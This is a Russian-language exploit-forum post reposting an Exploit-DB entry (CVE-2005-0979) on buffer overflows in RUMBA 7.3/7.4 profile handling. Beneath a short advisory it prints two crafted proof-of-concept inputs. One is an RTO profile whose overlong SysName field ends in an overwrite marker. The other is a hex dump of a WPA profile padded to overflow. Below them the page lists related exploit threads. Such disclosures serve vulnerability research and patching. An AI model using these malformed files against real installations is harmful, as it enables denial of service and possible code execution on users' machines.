Exploit RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25326
Проверка EDB
  1. Пройдено
Автор
BAHAA NAAMNEH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2005-0979
Дата публикации
2005-04-01
Код: 
source: https://www.securityfocus.com/bid/12965/info

RUMBA is reported prone to multiple buffer overflow vulnerabilities. Theses issues are reported to manifest when RTO and WPA profiles are loaded by the software.

Ultimately it is conjectured that this issue may be exploited by a remote attacker to execute arbitrary attacker-supplied code in the context of the vulnerable software.

RUMBA version 7.3 is reported prone to this issue, previous versions are also reported to be affected. 

-----------snip-of-foo.RTO-profile-file-----------

[RUMBAFIL]
Version=5.32
InterIndex=4
SysName=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBBBB
Type=RECV
Min=FALSE
Notify=TRUE
Percent=TRUE
Close=FALSE
Truncate=TRUE
Auto=FALSE
TruncateSpaces=TRUE
Nulls=FALSE
EncryptedPassword=FALSE
ASName=

-----------------------snip-----------------------

-------snip-of-foo.WPA-profile-file-(HEX)---------

00 00 00 00 00 00 00 43 3a 5c 50 72 6f 67 72 61
6d 20 46 69 6c 65 73 5c 4e 65 74 4d 61 6e 61 67
65 5c 52 55 4d 42 41 5c 53 79 73 74 65 6d 5c 50
72 66 53 61 76 65 31 2e 41 6d 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
78 78 78 78 78 78 78 78 78 78 78 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

-----------------------snip-----------------------
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Micro Focus Rumba 9.4 - Local Denial of Service
Ответы
0
Просмотры
668
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)
Ответы
0
Просмотры
640
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities
Ответы
0
Просмотры
374
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Local Buffer Overflow
Ответы
0
Просмотры
301
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)
Ответы
0
Просмотры
307
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rumba XM - Cross-Site Scripting
Ответы
0
Просмотры
265
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion
Ответы
0
Просмотры
500
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Terillion Reviews - Profile Id HTML Injection
Ответы
0
Просмотры
492
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PScript PForum 1.24/1.25 - User Profile HTML Injection
Ответы
0
Просмотры
441
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MXBB Profile Control Panel 0.91c - Module Remote File Inclusion
Ответы
0
Просмотры
440
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу